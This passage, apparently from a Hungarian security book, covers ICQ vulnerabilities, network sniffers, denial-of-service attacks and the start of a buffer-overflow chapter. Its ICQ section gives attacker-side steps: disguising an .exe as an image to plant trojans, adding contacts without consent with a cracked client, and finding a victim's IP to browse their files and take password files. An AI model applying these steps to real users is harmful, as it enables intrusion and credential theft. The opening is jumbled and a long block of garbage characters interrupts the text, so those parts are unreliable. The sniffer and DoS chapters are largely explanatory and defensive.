ICQ biztonsági kockázata azonban sokkal inkább annak a rendszernek a biztonságosságán múlik. minden alkalommal elindul ez a fájl. Az ICQ minden felhasználója egy saját számot kap. 8. Ezért ez sem jelent biztos védelmet. sőt MacOS-hoz és BeOS-hoz is van ilyen.praktikus és veszélyes Az „I seek you" egy kommunikációs eszköz. Az ICQ kiszolgálóelemei és egy Sub7 szerver -üzenet Védelem a ConCon ellen A http://www. amelyek biztonsági kockázatként jelölik meg az ICQ-t. hogy ez mit jelent). Az IP kiadása ugyan különböző beállításokkal megakadályozható (a 99b verziótól egy másikat is lehet megtévesztésként mutatni). Ez a szám a Universal Identifier Number.com/downloads/release. A kliense a legkülönbözőbb platformokon megtalálható. A leggyakrabban használt Windows-kliens mellett Linux alatt is több kliens létezik. Ezeket a hálóról származó eszközökkel lehet végrehajtani. amelyek kikerülik ezeket a beállításokat. amelyen a kliens fut. A felhasználóknak észnél kell lenniük. Megjegyzés: A mail-támadásoktól eltekintve a számítógép Indítópult mappájába is előszeretettel másolnak ConCon-fájlt. és újra kelljen indítani. vagy ki akarja. Ezek közül is egyértelműen az IP a legfontosabb. hogy „Van-e ICQ-d?" egyre gyakrabban kapjuk azt a választ. ofíline-ban. 3. Manapság már majdnem 150 millió szám létezik.2 ICQ .

A trükk a következő: a támadó kitömi a def.jpg . Egy ilyen támadást hajtottak végre például tesztcélokból egy Windows 98 és egy 2000 platform „ellen". hogy a támadó küld a usernek egy fájlt.2 Milyen biztonsági rések vannak? Korrupt linkek A különböző linkek megnyitása az ICQ-felhasználónál aktiválhat egy fájlt. hogy azonnal eldobja az ismeretlen linkeket.exe Az exe fájlból semmit sem látni *-ADADADADADADvADADADADADADADADADADADvADADADADA DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D *ADADADADADADADAD h»ADADADADADADvADADADADADADADADADADADvADADADADA |*>DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D i*-ADADADADADADADAD *»D D D D D A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D *ADADADADADADADAD ^ADADADADADADvADADADADADADADADADADADvADADADADA DADADADAD ^A£)A£)A£)A£>A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A ^A£)A£)A£)A£)A£)A£) V A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£) V A£)A£)A£)A£)A A A A A . amelyeket nekünk küldenek. Ha elküldi ezt a fájlt.exe fájl nevét egy sor üres karakterrel. Bizonyos parancsokkal összefüggésben azonban az egész merevlemezt is formattálhatják. És itt is működik az ott már leírt trükk: tegyük fel. hogy az ICQ-kliensünket úgy állítjuk be. például egy trójait vagy egy vírust. itt nem lényeges információkkal.asp? A DADADADADADADADADADADADADADADADADADADADADADAD *-ADADADADADADADAD ^A£)A£)A£)A£)A£)A£) V A£)A£)A£)A£)A£)A£)A£)A£)A£)A£)A£) V A£)A£)A£)A£)A *-DADADADADADADADAD *ADADADADADADvADADADADADADADADADADADvADADADADA DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D *»ADADADADADADADAD ^ADADADADADADvADADADADADADADADADADADvADADADADA *-DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D *-ADADADADADADADAD ^ADADADADADADvADADADADADADADADADADADvADADADADA DADAD!Ü! pl A£)A£)A£)A£)A£)VA£)A£)A£)» *DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D ^•ADADADADADADADAD *ADADADADADADvADADADADADADADADADADADvADADADADA *»DADADADAD A A A A A A A A A A A A A A A A A A A A A A A D D D D D D D D D D D D D D D D D D D D D D D ta»A£)A£)A£)A£)A£)A£)A£)A£) Védelem Ez ellen úgy lehet védekezni.com/link. A link így nézhet ki: http://www. úgy ICQ-val is lehet fájlokat küldeni és fogadni. a fogadónál megjelenik egy popup ablak a fájl megnevezésével és más.4. Fájlnevek kitömése az ICQ 99 alatt Ahogy mailben. def.jpg.8. egy trójait vagy egy vírust stb. pl.yahoo.

Ha a hackernek csak az áldozat IP-je van meg. Mire minden hibaüzenetet tudomásul vettek.exe végződés helyett csak a -jpg-et látjuk. Ha ezt elintézte. Letölt magának egy ICQ-cracket az internetről. Ezután egyszerűen Quit-et ír a Telnet kliensbe. Az . akkor a felhasználóból. hogy a felhasználó egy webszervert telepített.Így a popup ablakban már nincs elég hely.40-et a megtalált IP-re cseréli. hogy működtetünk-e webszervert a rendszerünkön. anélkül. Védekezés Az ICQ rendszeresen dolgozik chat-rendszere biztonságán. User hozzáfűzése engedély nélkül Az ICQ jóváhagyása időnként elég terhes a támadóknak. inaktiválja az ICQ-t. és megpróbál hozzáfűzni egy felhasználót. és a hacker ismerje az IP-jét. Ezért a legjobb védekezés az aktuális verzióra történő frissítés. ahol a 217. a Next-re kattint. Ezután meg kell szakítani a kapcsolatot a hálóval. vagy ha akarja. amelyek azt mondják. Megnézni egy felhasználó fájljait Itt megintcsak előfeltétel. amely közli. hogy az ICQ nem tud üzeneteket küldeni. és a tulajdonképpeni végződés. könnyen áldozat lesz. amelyet hozzá akar fűzni. hogy az áldozat ezt észrevenné. Rendesen ugyanis kap egy értesítést. megpatcheli a crackkel. hogy a rendszeres frissítés legalább rövid távon védelmet kínál. Itt az IP! Az ICQ lefagyasztása ICQ alatt megmutathatjuk más felhasználóknak. . ha elfogadja és végrehajtja a fájlt. Az így jelzett webszerver ugyanis behatolási pontot nyújthat a támadónak. Ha ez sikerült. egyetlen kattintással kijelöli a személy nevét. Ezt többnyire a fenti ikonra történő kattintással vagy a http://ipdesusers. és most is megjegyzendő. Az ICQ hibajelzéseket ad. Az interneten ehhez egész sor tool és crack van.40:80. Ezt a problémát elkerülendő. Egy erre a célra szívesen használt eszköz a UIN-IP. hogy az erről bármit is tudna. hogy megtámadja ezeket a rendszereket..82. akár meg is támadhatja. a Find User-rel megkeresi azt az UIN-t. a parancssorba a következőt írja: Telnet 217. Ez egy jó példa volt az ICQ kliens még fennálló bizonytalanságaira. az . hogy tényleg csak egy képet akarnak küldeni neki. amelyek lehetővé teszik a felhasználó felvételét a kapcsolati listára anélkül. a támadó már ott van a kívánt személy kapcsolati listáján. hogy többet megtudjon a chat-partneréről. Ez az ICQ-path megadása után a kontaktlistára bejegyzett userek minden IP-jét visszaadja. hogy ő bármit is észrevenne ebből. Ha a támadó például egy trójait vagy egy vírust használt. Ezáltal az áldozat ICQ-ja bezáródik.82. linkkel lehet elérni. amit gyakran ki is használ.172. Védelem Ez a bug az ICQ 2000-ben már nincs benne. ha egy áldozatot akarnak felvenni a kontaktlistájukra. a támadónak a következő lehetőségei vannak.exe már nem látható. Egy ilyen jel a hackernek égből pottyant ajándék. A felhasználó azt gondolja.172. Vagy a támadó a partnerrel való beszélgetés közben egyszerűen beírja a parancssorba: netstat -n. Amint az ICQ a kérdésre pozitív választ ad. Most teljes nyugalomban megfigyelheti az áldozatát. és egy idő múlva nem jelenik meg online-ként. hogy felkerült egy listára. ráadásul anélkül.

Védekezés Ha webszervert kell futtatnunk. amelyekre váltani kell.Most például beírhatná a böngészőjébe: http:// 217.html/. így a jelszavak elérésére is van lehetőség. A pontok a könyvtárakat jelölik. ne használjuk ezen a gépen az ICQ-t. Természetesen ez csak egy példa. mert a támadó nem fogja ismerni a pontos könyvtárstruktúrát.82. . user.40 /. ahol a 217.40 az áldozat IP címe. Most a támadó a számítógépére tudja menteni a kiválasztott fájlokat.172. hogy a C:\-hez jusson.172.82.pwl. A legtöbb esetben azonban a Windows szabvány könyvtárstruktúrája fordul elő.

fejezet .2 9.4 Mi az a sniffer? Hogyan működik egy sniffer? A sniffer veszélyei Mit lehet tenni a snifferek ellen? .Tartalom 9.9.1 9.3 9.

2 Hogyan működik egy sniffer? Egy számítógép valamennyi hálózati interfészének saját címe van a LAN-on. 9. ha azok nem az illető gépnek vannak címezve. Ebből a fejezetből kiderül.9 Sniffer A snifferek jelentik az egyik legnagyobb veszélyt a hálózatokra. lehetnek például jelszavak vagy felhasználói nevek. de a nem neki szóló címzés miatt nem dolgozza fel azokat. Hasonló rendszert találunk az internet-címzésnél is. mert a legtöbb információ egyáltalán nem érdekes. a sniffer tulajdonságaitól függően. és rendszerint egy fájlba írják az analizált adatokat. A felhasznált sniffertől függően különböző protokollokat lehet lehallgatni. Másrészt a snifferek lehetőséget nyújtanak a támadóknak. amelyiknek címezve vannak. amely a hálózati interfészt úgynevezett promiscuous módra állítja át. melyek a snifferek felhasználási területei. betekintést kínálva annak. Ez a mód bizonyos alkalmazásokon keresztül akkor is megengedi a csomagok felvételét és feldolgozását. Az adatokat csak az a számítógép veszi fel. Az elfogott információkat a sniffer az output (kimeneti) fájlokba menü. 9. ethernet frame-nek is nevezett csomagokban kerül a hub-ra. hogy magállapítsa. A hálózatban gyakran használnak hub-ot az adatok szétosztására. Ezek. az IPX. naplózzák az adatfolyamot. Ha elküldünk egy üzenetet. a Banyán VINES és az LCC. hol van a probléma a hálózaton belül. A többi hálózati interfész ugyan fogadja az adatokat. és milyen gondokat okozhatnak. Így a sniffer hozzákezdhet a tulajdonképpeni munkájához. hogy csak a valóban releváns adatokkal foglalkozzon. külön kis.1 Mi az a sniffer? A sniffereknek különböző felhasználási területeik vannak. Ezért a legtöbb sniffert úgy tervezték. hogy egész hálózati csomagokat „hallgassanak le". A snifferek a WWW/LAN/WAN egyes gépeire telepíthetők. Annak persze nem lenne értelme. az Apple Talk. Ez különbözteti meg a komputert a hálózat többi tagjától. aki installálta a sniffert. akkor a rendszergazda bevethet egy sniffert. hogy mit is rejt ez a fogalom. hogy a hálózat teljes adatforgalmát kiértékelje. Ezen a ponton avatkozik be a sniffer. Egyrészt a rendszergazdák pótolhatatlan segítőtársai a hálózati problémák vagy a potenciálisan veszélyeztetett területek felderítésében. és onnan továbbítódik minden csatlakoztatott számítógépre. az Az Analyzer az egyik legismertebb sniffer . Ha például gondok támadnak a hálózat egy részében a hiányos konfiguráció miatt. Ezek közé tartoznak többek között: a TCP/IP (Ethernet/WWW).

Felhasználói oldalról titkosító protokollokkal. mégpedig úgy. ez a variáció. valóban csak a célgépre továbbítják az adatokat. azonban ahogy ez a protokoll majd szabvánnyá válik a hálón. mert jobban szeretik. Vannak programok. amelyek tesztelni tudják a hálózati reakcióidőket. amely szintén kódolva továbbítja az adatokat. akkor jól be lehet határolni azt a számítógépet. amelyik potenciális sniffer lehet. Ha biztosra akarunk menni. amelyekről a továbbiakban még írni fogunk. Részletesen most nem foglalkozunk az Ipv6-tal. mint hogy nem tároljuk a jelszavakat a merevlemezen. A snifferek a normál felhasználó szempontjából semmilyen nyomot nem hagynak maguk után. mint a fentiek. amely Ipv6 vagy IPng néven ismert. mert ezeket bármikor megtudhatja a sniffer. a megoldás kézenfekvőnek tűnik: csak olyan hálózati kártyát szabad használni. amelyek.9. Ha egy hálózatban rendszeresen tesztelik az egyes csatlakoztatott számítógépek reakcióidejét. Titkosítás Az alkalmazásokban használt kódolás minden bizonnyal a legfontosabb védelem a sniffer-támadások ellen. Ezeket használják akkor is. 9. a reakcióideje hosszabb lesz az általában szokásosnál. A leleplezéshez csak a rendszergazdáknak vannak különböző programjaik. állandó jelszavuk. Mivel egy sniffer csak úgy tud működni. amelynek a hálózati interfésze promiscuous módban van. A csatlakozások ellenőrzése A rendszergazda is ellenőrizheti a LAN-ban található számítógépek hálózati kártyáit promiscuous módra vagy egyéb gyanús alkalmazásokra. amelynél az adatok hálózati szinten lesznek kódolva. Nagyobb hálózatoknál megfontolandók az olyan biztonsági mechanizmusok. Így azután nem is szükséges közvetlenül beavatkozni egy meghatározott felhasználó rendszerébe ahhoz. Ezért a normál hálózati felhasználó aligha tudja felfedezni a sniffert a LAN-on. ha a hálózati kártya promiscuous módban van. mint amilyen az SSH vagy az SSL. Ipv6 Hamarosan megjelenik a TCP/IP új verziója.4 Mit lehet tenni a snifferek ellen? A snifferek felfedezéséhez és eltávolításához jól kell ismerni a hálózati topológiát. hogy a fogadott adatokat minden vele kapcsolatban álló számítógépnek elküldi. a hálózatba integrált notebookot használ. Intézkedés Adatelosztás Leírás Egy sniffer támadási pontját tulajdonképpen a hubnak az a tulajdonsága nyitja meg. Sajnos ez az eljárás elég költséges. a hub-ok helyett switcheket vagy auto-switching hub-okat is használhatunk.3 A sniffer veszélyei A snifferek nagy veszélyt jelentenek a hálózati struktúrára. hogy kikémleljék mail-postafiókja vagy online banki jelszavát. Ilyen kártyákat (is) kínai pl. az S/POP nevű eljárás. Az olyan biztonsági intézkedések. és a felhasználók sem veszik szívesen. a snifferek problémája is meg fog szűnni (egy időre). hogy csak a címzett gép tudja dekódolni. védhetjük az adatainkat a siffherek ellen. . a normál hubokkal ellentétben. kevéssé hatékony. amelyek csak egyszer érvényesek. tulajdonképpen semmit sem érnek. Intézkedés Hálózati kártya Leírás Egyszerűbb és olcsóbb megoldás megfelelő hálózati kártyával felszerelni a LAN-ra csatlakoztatott számítógépeket. az IBM. éppúgy. mint az S/Key vagy a SecurelD-Token. a 3Com. Titkosítással biztonságossá lehet tenni az adatátvitelt. Ezeknél jelszavak kiosztásáról van szó. amely nem engedélyezi ezt a módot. amikor egy hálózat teljesítményének a gyenge pontjait keresik. Ez a protokoll Ipsec-et is tartalmaz. Ezek az eszközök azonban drágábbak az egyszerű hub-oknál. a Hewlett-Packard és az Intel. vagyis passzívan működnek. adatokat küldenek. A mail-postafiókok elleni támadásoknak is van egy biztos ellenszere. Az alábbi táblázatból részletesen megismerhetők a védelmi mechanizmusok. A döntően hálózati felhasználás azonban alapvetően nagyobb ráfordítást igénylő intézkedéseket tesz szükségessé. ráadásul csak a támadó gépén futnak. amit a sniffelés után magával visz. ha van egy saját. mert a teljes hálózati adatforgalmat felügyelhetik. Ha azonban a támadó egy. A reakcióidő ellenőrzése Ha egy számítógépre.

amelyek leleplezik. mivel ott az adatok eleve kódolva továbbítódnak. Mivel a legtöbb felhasználó nem szívesen használ manuális kódolást. így ezt is minden sniffer foghatja. amelyek azt a számítógépet ellenőrzik. amely csak biztonságosan kódolva továbbítja az adatokat. Védelmi Intézkedések a snifferek ellen Végeredményben azonban mindig lesznek programok. amely mint snifftest. Az olyan programok. ha a fájlok megnyitása a saját gépen történik. hogy sok. Az e-mail-küldésnél mindenesetre problematikus. . elérhetik ugyan a céljukat. mert többnyire csak bizonyos hálózati kártyák búgjait ellenőrzik. Anti-sniffer' A hálón a legkülönbözőbb programokat kínálják a snifferek felkutatásához. csupán mail-szolgáltatást kínáló szolgáltató csak üzletileg kínálja az SSL használatát. amelyek felhívják a figyelmet az ilyen támadásokra. Vannak azonban olyan programok is. Igazán csak az IPv6 használatával lehet majd biztonságos adatátvitellel számolni. hogy védetten lehessen bejelentkezni a Telnetről. vagy olyan programokat használnak.c is ismert. amelyek ugyan hálózatról működnek. Tehát figyelni kell arra. de nincs nagy hasznuk. hogy milyen szolgáltatásokat veszünk igénybe a kevéssé biztonságos hálózatokon keresztül. Ilyen program pl. új lehetőséget kellett fejleszteni. Ha azonban a PGP-vel kódolt maileket a mail-szerveren nyitják meg (ami biztosan gyakran megtörténik).Intézkedés Leírás A HTTP-átvitelek titkosítására szolgál az interneten az SSL (Secure Socket Layer). így a sniffer nem tud mit kezdeni velük. Már böngészőket is lehet kapni megfelelő erős kódolással. SSL SSH Mivel a Telnet kódolatlanul továbbítja az adatokat. A PGP-vel vagy hasonló programokkal kódolt fájlok/mailek biztonságában is csak akkor lehet bízni. mégsem kínálnak lehetőséget az adatok kódolására. akkor a megnyitáshoz szükséges jelszó megint csak a hálózaton megy keresztül. ha egy másik számítógép éppen sniffel. például a jelszavakat és a parancsokat is. a kódolási folyamatnak automatikusnak is kellene lennie. Az ilyen programokkal szemben azonban mindig egy kicsit szkeptikusnak kell maradni. Unixhoz/Linuxhoz a Beavis and Butthead. amelyen éppen lokálisan rajta vagyunk. A szokásos Telnet-kliensek helyett SSH-klienset (Secured Shell) is lehet használni.

4 Az IP-spoofing mint előfeltétel Out-of-Band csomagok .5 TCP-Syn-Flooding 10.Tartalom 10.Distributed Denial of Service támadások Védelem a DoS-támadások ellen . fejezet.7 10.a „nuken" Large Packet-támadások avagy a Ping of Death Land támadások 10.2 10.8 10.1 10.6 10.3 10.9 Ping-Flodding Smurf DDoS .10.

ha a támadó nem talál más utat. csak a hencegése alapján kapták el egy idevágó chatszobában.1 Az IP-spoofing mint előfeltétel Az IP-spoofing egy támadási eljárás. hogy ezeknek a támadásoknak különböző fajtái vannak. és mind a Windows 98/98SE/ME-t. DoS-támadásokat többnyire akkor hajtanak végre. ami azt jelenti. A Microsoft felismerte ezt a hibát. Kedvelt célok azok a felhasználók is. 10.2 Out-of-Band csomagok . és . A DoS-támadások az operációs rendszerek. és ezzel a protokollal továbbítódik. amelyeknek többnyire jól kezelhető.többek között . mint a szervereket. A WinGatesszerver feltételezi. vagy ha éppen az a célja. grafikus felületük van. és úgy lefagyasztják. hogy minden Kettő a legismertebb nukerek közül 10. az eBay. hogy a rendszert egy időre lebénítsa. hogy a rendszert lerohanja. Ezért az Out of Band csomagokat az olyan rendszerek megtámadásához használják. amelynél hamis IP-számot használnak. Így a támadót. A rendszerek kiesése következtében fellépő kár mintegy 100 millió dollárra rúgott. és megakadályozzák az azonosítását. Ha a 135. akik game-szervereken vagy IRC-szervereken találhatók.Telnet session-ökhöz használják. aki két napig bombázta a Yahoo-t és társait. és ezeken egyenként körülbelül 40000 karaktert küldenek. portok egy számukra nem értelmezhető karaktersort kapnak. két napon belül indították a Yahoo. és a 139. a CNN és néhány más nagyobb portál ellen a hálón. A különböző támadásokhoz egész sor eszköz áll a támadók rendelkezésére. . sok DoS-támadás alapját képzi. hogy hamis identitást színleljenek a megtámadott IT-rendszer felé. mint például a WinGates.10 A Denial of Service támadás A DoS. Az egyik legismertebb támadást 2000 februárjában. hogy a támadó nyomait eltüntessék. mert csak a szervezethez kapcsolódó rendszerekből érkező támadásokat akadályozza meg.szolgáltatás megtagadó) támadások az internet egyik legnagyobb veszélyforrásává váltak az idők során. A DoS-támadások célzott végrehajtásának másik oka lehet például. Az OOB a TCP/IP egyik tulajdonsága. amelynél a csomag feladójának a címét megváltoztatják. 1998-ban létrejött egy védelmi szervezet. A DoS-támadások ugyanúgy érintik az internet-felhasználókat. Egy ilyen támadásnál számítógépeket rohannak le az interneten. Vagy már a támadást is ez teszi lehetővé. a rendszer összeomlik.01-t például így lehetne megtámadni: 100 kapcsolatot állítanak elő a WinGates-hez. A WinGates 4. hogy az egy ideig nem is tudja újrakezdeni a működését. így a támadónak még alaposabb technikai ismeretekkel sem kell rendelkeznie a használatukhoz. amely lehetetlenné teszi hamisított IP-csomagok internetre küldését a csatlakoztatott hálózatüzemeltetőknél.(Denial of Service -.a „nuken'' A legismertebb DoS-támadások közé tartozik a miken vagy az Out-ofBand (OOB) csomagok küldése. Az IP-spoofing. hogy egy rendszert újraindításra kényszerítsenek valamilyen változtatás érvénybe léptetése érdekében (jelszó: trójai). programok és protokollok hibáit használják ki. Az Out of Band csomagok felhasználását a DoS-támadásokhoz a Microsoft egy hibás NetBEUI implementációja tette lehetővé. mind a 2000-t ellenállóvá tette e támadások ellen. ez csak egy behatárolt megoldás. Megengedi az adatok átvitelét a normál sorrenden kívül. például a webszervereket. vagy arra szolgál. Sajnos. Az eredmény azonban mindig ugyanaz: a megtámadott számítógép felmondja a szolgálatot.

az Ethernet-csomagok pedig csak 1500 bájtosak. amely a teljes csomagot nagyobbnak mutatja 65535 bájtnál. hogy az adatok át tudjanak futni a különböző hálózati rétegeken. és válaszul ACK-csomagot (ACK = Acknowledgement = a fogadás nyugtázása) küld. és az adattömeg addig halmozódik. amíg el nem használja a szerver pufferét. a protokoll-implementáció említett hibáját kihasználva. és várja a választ az ACK l-re és 2-re.kapcsolat fennmarad. Ezt a folyamatot Three Way Handshake-nek is nevezik. és megbénítja az áldozat rendszerét. Minden csomagtöredék tartalmaz egy offset értéket és egy azonosítási számot. és aztán újra reassemblálja (összerakja) őket. 10. • A támadó elküldi a SYN l-et. sikertelen lesz. . 10. • A host válaszol a SYN 2-re. 10. ha két számítógép között TCP/IP-n keresztül jön létre kapcsolat. és a gép összeomlik.3 Large Packet-támadások avagy a Ping of Death A Denial of Service támadások különösen végzetes fajtája a Ping of Death. • És így tovább. Ezeket SYNcsomagoknak is nevezik. és előállítani a kapcsolatot. kész vagyok" ACKválaszcsomaggal nyugtázni. hogy egy rendszert hatalmas adatfolyammal terheljenek. hogy a hostot rettenetes mennyiségű további SYNcsomaggal bombázza. az rövid időn belül felmondja a szolgálatot. • A támadó elküldi a SYN 3-at.a feladó címe megegyezik a címzettel. A szerver minden SYN-csomagra ACK-csomaggal válaszol. a résztvevők először egy Three Way Handshake-et váltanak.4 Land támadások A Land támadások a TCP-implementáció egy hibáját használják ki ahhoz. Ez a kísérlet azonban. A TCP-Syn-Flodding támadásnál a támadó először hamis feladóval nagy számú SYN-csomagot. majd összeomlást idézzenek elő. de ezt a csomagot most egy saját nyitott portjára fogja küldeni. valamint a portszám. elküldi az ACK 2-ét. Az Internet Protokoll headerrel (fejléccel) együtt pontosan 65535 bájtot csomagol egyetlen csomagba. hogy egyszerűbb legyen az átvitelük. vagyis feldarabolja. Ezek a tények teszik lehetővé. egy ilyen támadás lefolyásának a sémája. és várja a választ. Ez a következőképpen történik. Ez utóbbinak semmi köze a tulajdonképpeni ping-parancshoz. a nemlétező feladó miatt. és a számítógép bizonyos várakozási idő után eredménytelennek nyilvánítja a kísérletet. Mindez azért történik. A Ping of Death támadások a következő protokolloknál lehetségesek: ICMP. A támadásnak ezt a fajtáját az elkészült bugfixekkel ma már a legtöbb operációs rendszer visszaveri. Röviddel a halálos lökés előtt Mikor egy számítógép kapcsolatot próbál felépíteni egy másikkal. amelyről ebben a fejezetben még szó lesz. Az első csomagban még egy TCP-header is található. Ha most a rendszergazda megpróbál belépni.5 TCP-Syn-Flooding Mint ahogy a Land támadásoknál már leírtuk. akkor speciális IP-csomagokat küld. out of buffer hibaüzenetet kap. amely meghatározza. hogy az utolsó töredéknek olyan offset értéket lehet adni. hamisított feladóval küldi a SYN-csomagokat egy szerverre . ahol a sok IP-stack egyfajta túlcsordulást idéz elő. Aki viszont Land támadást hajt végre. A címzett reagál erre. • A támadó elküldi a SYN 2-t. Az ennél nagyobb csomagokat fragmentálja. Ezek ellen a támadások ellen is régóta létezik már bugfix. íme. amelyekkel bejelenti a kapcsolatot. vagyis „Beszélni akarok veled" üzenetet küld a hostra. hogy milyen csomagról van szó. UDP és TCP. Ha ezt a várakozási időt a támadó arra használja. A host ezt megpróbálja egy „OK. elküldi az ACK l-et. Ez a túlméretezett csomag túlcsordulást (Buffer Overflow-t) okoz a rendszerben. • A host válaszol a SYN l-re.

A megváltoztatott feladócímek. hogy rajta keresztül hajtsák végre más rendszerek ellen a támadásokat. és meg lehet akadályozni. 10. A segítségükkel el lehet kapni a módosított csomagokat. Az előkészítés abból áll. hogy az áldozatát nagy mennyiségű adatcsomaggal szembesítse. Ezeken a rendszereken trójaiakat helyez el. az eBay és társai ellen. amelyre minden. Ha az ismétlés elég gyakori. Előkészület egy DDoS támadásra 10.8 DDoSDistributed Denial of Service támadások A DDoS-nál (DDoS-támadás = elosztott szolgáltatás megtagadó támadás) még a tulajdonképpeni roham előtt szerez a támadó elérést néhány másik rendszerre. és rövid idő múlva frissítést kínálnak hozzájuk. A 2000. hogy távirányítani tudja a szá- . amitől az összeomlik. és beszerzési forrást kínálnak a megfelelő frissítésekhez. A gyártók előbb vagy utóbb felfedezik az operációs rendszerekben és a szerverszoftverekben a biztonsági szempontból gyenge pontokat. a host pedig valamennyire megpróbál válaszolni.minden esetben érvényes. és ezeket arra használja. Megpingelünk egy hostot. hanem arra is használhatják a támadók. s az áldozatot csomagok áradatával önti el. hogy minden választ az áldozat kap meg. februári híres DDoS támadások óta állandóan növekszik az ilyen jellegű támadásokra alkalmas programok száma a Yahoo. hogy sor kerüljön a további feldolgozásukra. Az ilyen támadások után többnyire teljesen le kell venni a szervert a hálózatról.9 Védelem a DoS-támadások ellen A normál felhasználó számítógépe nemcsak áldozata lehet a DoStámadásoknak. Ha ilyen módon másodpercenként 1000 pinget küldenek 1000 különböző számítógépre. hogy mindig tájékozódni kell a mindenkori operációs rendszer biztonságot érintő frissítéseiről. Pingekkel bombázzák a célt. Ehhez a támadó hibás rendszereket keres szkenneléssel (közelebbit lásd a szkennelésről szóló fejezetben). hogy a támadó a lehető legtöbb olyan rendszert megtalálja. a host nem tud több kérdésre válaszolni. ezért is elengedhetetlen.7 Smurf A Smurf-nél a támadó egy hálózat broadcast címére küld egy pinget manipulált feladócímmel. a broadcast cím mögötti számítógép válaszol. illetve a programokat többnyire trójaiak segítségével telepítik a rendszerekre. és ha elérhető. Ezek azonnal tájékoztatnak az újabb gyenge pontok felfedezéséről. érdemes előfizetni a Computer Emergency Response Teams (CERT) levelezőlistájára http://www.cert. Legyen az szerver vagy normál felhasználó . A DoS-támadások ellen a jól konfigurált tűzfalak is védelmet kínálnak. hogy megállapítsák egy host elérhetőségét. visszhangszerű választ ad. Smurffel akár nagyon kis átviteli kapacitással rendelkező támadók (modem. Ráadásul a ping-flodding támadásokat az áldozat csak akkor fogja észrevenni.10. 10. ezeket feltölti scriptekkel vagy programokkal. az áldozatéi. ha a szolgáltatója a forgalom szerint számol el. azt eredményezik. amelyeken biztosítani tudja magának a rendszergazdai jogokat. fejezetben írtunk. A scripteket.vagy ISDN-csatlakozás) is térdre tudnak kényszeríteni nagy átviteli sávszélességgel rendelkező áldozatokat. az áldozat több mint egymillió választ kap.6 Ping-Flodding A pingeket az interneten és a hálózatokban használják. hogy fel tudja tölteni a scripteket a támadáshoz. (A trójaikról a 4. Ezt használják ki a támadók a Ping-Floddingnál.org és a gyártóéra.) Ha elegendő kiszolgálót talált. Ez bizony rengeteg választ jelent. Az érintett rendszer a bemenő adatok terhe alatt szó szerint összeomlik. mítógépeket. Hogy a gyenge pontok dolgában mindig képben legyünk. hogy mindig legyen aktuális vírusvizsgáló a gépünkön.

fejezet .1.2.5.11.2 Hogyan működik? 11.3 Minek kell a Shellcode változónál állnia? 11.1.1. 11.1 Az operációs rendszer memóriakezelése 11.1 Szöveg 11.1 Hogyan lehet ezt kihasználni? 11.2.4 11.2.Tartalom 11.3 A stack (magyarul: halom/rakás) 11.2 Adatok 11.5 Áldozat a Buffer-Overflow-kért Honnan lehet felismerni a Buffer-Overflow-t? Milyen védelmi mechanizmusok vannak? 11.2 A Buffer-Overflow-k és a tűzfalak .3 11.1 Összefüggés a CPU és a Buffer-Overflow között.5.2 A Buffer-Overflow-támadások 11.

ahol legfelül van a 10.11 Buffer-Overflow 11. De arra is lehet használni ezeket a támadásokat. mint egymásra halmozott lapokat.2 Adatok Az adatrész inicializált és inicializálatlan adatokra osztható. de távoli eléréssel is. ahelyett. Ennek a hozzárendelt területnek a méretét a „brk" paranccsal lehet megkapni. A címek. Más elérések „segmentation fault" hibával végződnek. 11.static"-ként deklarálódnak.2 A Buffer-Overflow-támadások A Buffer-Owerflow tulajdonképpen annyit jelent. megpróbálja beleírni. ha egy eljárás vagy függvény lefutott.1 Az operációs rendszer memóriakezelése Az alábbi vázlat egy operációs rendszer memóriafelépítését szemlélteti. vagyis ezeken nem lehet változtatni. Ezeket a karakterláncokat az operációs rendszer „readonly"-ként kezeli. ellentétben a FIFO-elvvel (first in. elsőként kerülnek ki. A Buffer-Overflow-rohamokat arra használják. hogy eldobná a program. mint amilyennel például a pipe-nál találkozhatunk. first out) működik. Ebben leírta. hogy kidöntsenek egy weboldalt. 1996-ban az AlephOne Bugtraq levelezőkör moderátora cikket közölt Smashing the Stack for Fun and Profit címen. számú lap. amelyek legfelül helyezkednek el (tehát utoljára kerültek oda). amelyek már nem férnek be a pufferba. amelyekre egy program futása ugrik. amelyben a normál változók adatai találhatók. amelyet egy program kiad. Ezzel egymásra épülő célokat lehet elérni: pl. Ezt úgy csinálják.1. Így végre lehet hajtani fizikai hozzáféréssel a szerverhez. számú és legalul az 1. Az alsó memóriában illetve a szövegrészben csak karakterláncok vannak tárolva. amelyeket aztán puffer-túlcsordulásos. Azokat az adatokat. hogy többet írnak a pufferbe. szintén a stackben tárolódnak (például a szegmensek kezdő címei. 11. Alsó memória SZÖVEG inicializált adatok inicializálatlan adatok Felső memória STACK Memóriafelépítés 11.1. Ennek következtében az .) Erről azonban később. A stack az a memóriaterület. hogy támadásokat hajtsanak végre szerverek ellen.1. Egyes esetekben ez akár a boot-jogokig terjedhet. vagyis Buffer-Overflow támadásokhoz lehet felhasználni. A stack LIFO-elven (last in. hogy megöröklik a megszakított szolgáltatás jogait. egy bizonyos szolgáltatást összeomlásra kényszeríteni. amelyek . hogy később speciális jogokat szerezzenek a szerverhez. A legérdekesebb ezekben a támadásokban a Buffer-Overflow-rohamok függetlensége a támadó székhelyétől.3 A stack (magyarul: halom/rakás) A stacket elképzelhetjük úgy. first out).1 Szöveg Egy adott programhoz rendelt memóriatartomány több részre oszlik. hogyan vezethet a rossz programozás biztonsági résekhez. hogy az elemek. például a Súgó szövege. Ez azt jelenti. amelyekkel az egész számítógép felett ellenőrzést szereznek. mint amennyit az fel tud dolgozni.. A stack szerkesztésének legfontosabb assembler parancsai a PUSH (adatokat tesz a stackhez) és a POP (olvassa a stack legfelső elemét). 11.

